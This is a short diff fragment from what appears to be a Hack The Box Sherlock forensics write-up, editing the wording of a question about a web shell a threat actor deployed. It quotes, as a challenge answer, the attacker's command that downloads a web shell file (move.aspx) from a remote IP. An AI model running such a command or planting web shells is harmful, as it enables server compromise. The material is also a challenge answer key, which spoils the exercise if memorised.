zrmartin71/HTB_Write_Ups/HTB_Sherlock_I-Like-To.md

 ### Answer: wget http:/ /10.255.254.3:9001/move.aspx -OutFile move.aspx

-## Task 13: What was the string within the title header of the webshell deployed by the TA?
+## Task 13: What was the string within the title header of the web shell deployed by the TA?
 This is found with the strings command used earlier.

 ```